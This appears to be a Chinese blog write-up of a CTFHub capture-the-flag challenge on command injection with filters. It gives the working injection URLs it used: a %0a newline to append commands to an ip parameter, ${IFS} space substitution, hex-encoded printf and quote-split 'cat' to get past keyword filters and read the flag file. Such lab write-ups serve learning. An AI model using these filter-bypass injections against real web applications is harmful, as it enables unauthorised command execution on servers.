ctfhub技能树—RCE—综合过滤练习
2024-09-03 03:39:04
打开靶机
查看页面信息
查看源码可以发现这一次过滤了很多东西,查看当前目录信息
查询到%0a为换行符,可以利用这个url编码进行命令注入,开始尝试
http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0als#
查看flag_is_here文件夹内文件信息
challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Als<flag_is_here#
flag也被过滤了……
查看大佬的wp,可以使用16进制编码绕过
开始尝试
http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Als${IFS}$(printf${IFS}%22\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65%22)#
使用同样的方法查看文件信息
http://challenge-2a4584dabb18d320.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0Aca%27%27t${IFS}$(printf${IFS}%22\x66\x6C\x61\x67\x5F\x69\x73\x5F\x68\x65\x72\x65\x2F\x66\x6C\x61\x67\x5F\x32\x31\x37\x38\x38\x33\x31\x31\x36\x38\x38\x36\x30\x31\x2E\x70\x68\x70%22)#
成功拿到flag
附上大佬文章链接
https://blog.csdn.net/bmth666/article/details/104836708
最新文章
- .NET WEB程序员需要掌握的技能
- Unity3D 搭建优雅的UI框架
- C#中使用反射获取结构体实例
- Web 开发中应用 HTML5 技术的10个实例教程
- [DeviceOne开发]-地区选择
- 基于boa服务器的web控制mini2440的GPIO口
- Redis 集合操作
- dedecms代码研究一
- Hibernate 、Hql查询和Criteria查询
- dede 标签
- [CSS3] 学习笔记-背景与边框相关样式
- poj2349,最小生成树!
- Android智能手机中各种音频场景下的audio data path
- 2554 ACM 杭电 数学
- mybatis 学习总结笔记Day2
- hdu-3671-tarjin/割点方案
- jQuery对标签、类样式、值、文档、DOM对象的操作
- ioctl函数详细说明(网络)
- Nginx web服务优化 (一)
- 20145322第一次JAVA实验报告
热门文章
- easyui form提交时验证必填,打开时不显示必填提示
- mysqldump: [ERROR] unknown variable &#39;database=test&#39;.
- 基于nacos注册中心的ribbon定制规则
- 一文说通C#中的异步迭代器
- jmeter的一些知识目录
- Spark性能优化指南
- 工具-Git与GitHub-分支管理(99.5.2)
- matplotlib的学习15-次坐标轴
- .net core 3.1 过滤器(Filter) 与中间件与AOP面向切面 与拦截器及其应用
- 记录第一次使用Vivado——以全加器为例子